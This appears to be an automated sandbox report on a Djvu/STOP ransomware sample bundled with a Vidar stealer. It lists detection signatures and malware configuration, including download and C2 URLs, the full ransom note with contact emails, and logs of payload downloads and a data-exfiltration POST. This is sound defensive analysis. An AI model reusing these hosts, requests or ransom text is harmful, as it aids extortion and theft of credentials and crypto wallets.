Windows Analysis Report
2OmglUwx83.exe

Overview

General Information

Sample Name: 2OmglUwx83.exe
Analysis ID: 679173
MD5: 24b6effdd763befb6ff4a657e15c77bc
SHA1: dd09691ceccd54d7e68a9c6553a6b94452dc7c85
SHA256: d0202dee37da4da0375e0034e802e0351cf3185cc8cd6ad041ffca4c89d97797
Tags: exeStop
Infos:

Detection

Djvu, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found ransom note / readme
Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Writes many files with high entropy
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Uses cacls to modify the permissions of files
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://rgyui.top/dl/build2.exe Avira URL Cloud: Label: malware
Source: http://acacaca.org/test2/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true Avira URL Cloud: Label: malware
Source: http://rgyui.top/dl/build2.exe$run Avira URL Cloud: Label: malware
Source: http://acacaca.org/files/1/build3.exe Avira URL Cloud: Label: malware
Source: http://acacaca.org/files/1/build3.exerun0d Avira URL Cloud: Label: malware
Source: http://acacaca.org/test2/get.php Avira URL Cloud: Label: malware
Source: http://acacaca.org/files/1/build3.exed5 Avira URL Cloud: Label: malware
Source: http://rgyui.top/dl/build2.exerunb4e97Bx Avira URL Cloud: Label: malware
Source: http://rgyui.top/dl/build2.exe~ Avira URL Cloud: Label: malware
Source: http://acacaca.org/files/1/build3.exe$run Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: 2OmglUwx83.exe Virustotal: Detection: 54% Perma Link
Source: 2OmglUwx83.exe ReversingLabs: Detection: 44%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Metadefender: Detection: 37% Perma Link
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe Metadefender: Detection: 37% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe ReversingLabs: Detection: 80%
Machine Learning detection for sample
Source: 2OmglUwx83.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe Joe Sandbox ML: detected
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack Malware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://acacaca.org/files/1/build3.exe"], "C2 url": "http://acacaca.org/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\W
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_0040E870
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_0040EAA0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 1_2_00410FC0
Source: 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----

Compliance
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Unpacked PE file: 13.2.build2.exe.60900000.1.unpack
Uses 32bit PE files
Source: 2OmglUwx83.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\_readme.txt Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\_readme.txt Jump to behavior
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49785 version: TLS 1.2
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 2OmglUwx83.exe, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\bocepe redipov\son kihaseleyadej54\p.pdb source: build2.exe, 0000000C.00000000.393039147.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000C.00000002.412815687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000D.00000000.403227306.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe.8.dr, build2[1].exe.8.dr
Source: Binary string: C:\bukasilo15\tili 3.pdb source: 2OmglUwx83.exe
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 2OmglUwx83.exe, 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: ?"C:\bocepe redipov\son kihaseleyadej54\p.pdb source: build2.exe, 0000000C.00000000.393039147.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000C.00000002.412815687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe, 0000000D.00000000.403227306.0000000000401000.00000020.00000001.01000000.00000006.sdmp, build2.exe.8.dr, build2[1].exe.8.dr
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_00410160
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_0040F730

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:50519 -> 8.8.8.8:53
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.7:49771 -> 151.251.24.5:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.7:49771 -> 151.251.24.5:80
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 5.163.244.118:80 -> 192.168.2.7:49772
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.7:49773 -> 5.163.244.118:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.7:49773 -> 5.163.244.118:80
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 1080
Source: unknown Network traffic detected: HTTP traffic on port 1080 -> 49780
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://acacaca.org/test2/get.php
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /pegasusfly1 HTTP/1.1Host: t.me
Source: global traffic HTTP traffic detected: GET /517 HTTP/1.1Host: 49.12.9.140:1080
Source: global traffic HTTP traffic detected: GET /2277399138.zip HTTP/1.1Host: 49.12.9.140:1080Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----8838260965650276Host: 49.12.9.140:1080Content-Length: 118025Connection: Keep-AliveCache-Control: no-cache
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Aug 2022 09:22:38 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Tue, 02 Aug 2022 09:14:30 GMTETag: "6d800-5e53e8b405d14"Accept-Ranges: bytesContent-Length: 448512Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 40 7c 08 d3 21 12 5b d3 21 12 5b d3 21 12 5b cd 73 87 5b c4 21 12 5b cd 73 91 5b 5b 21 12 5b f4 e7 69 5b d4 21 12 5b d3 21 13 5b 02 21 12 5b cd 73 96 5b ec 21 12 5b cd 73 86 5b d2 21 12 5b cd 73 83 5b d2 21 12 5b 52 69 63 68 d3 21 12 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 d6 cc d3 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 26 03 00 00 7e 04 00 00 00 00 00 90 b9 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 07 00 00 04 00 00 10 a7 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 22 03 00 50 00 00 00 00 a0 06 00 d0 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 14 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 24 03 00 00 10 00 00 00 26 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 29 03 00 00 40 03 00 00 9a 02 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 6f 6e 61 6d 69 00 00 04 00 00 00 70 06 00 00 04 00 00 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 79 6f 73 6f 7a 69 00 00 04 00 00 00 80 06 00 00 04 00 00 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 61 79 00 00 00 00 96 00 00 00 00 90 06 00 00 02 00 00 00 cc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 08 01 00 00 a0 06 00 00 0a 01 00 00 ce 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.0.217.254 162.0.217.254
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49780 -> 49.12.9.140:1080
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140/
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140/ppData
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140/r
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140/rontdesk
Source: build2.exe, 0000000D.00000003.421064532.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.620168713.00000000022C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/)
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/1Y
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/2277399138.zip
Source: build2.exe, 0000000D.00000003.426193570.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.429044334.00000000006B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/2277399138.zipF
Source: build2.exe, 0000000D.00000003.426193570.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.429044334.00000000006B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/2277399138.zipJ
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/2277399138.zipm
Source: build2.exe, 0000000D.00000003.426193570.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.429044334.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/517
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/C
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/a
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/n
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/nS
Source: build2.exe, 0000000D.00000002.620168713.00000000022C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080;Dx66
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.640491623.000000000932B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/files/1/build3.exe
Source: 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/files/1/build3.exe$run
Source: 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/files/1/build3.exed5
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/files/1/build3.exerun0d
Source: 2OmglUwx83.exe, 00000008.00000002.616576425.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/test2/get.php
Source: 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/test2/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true
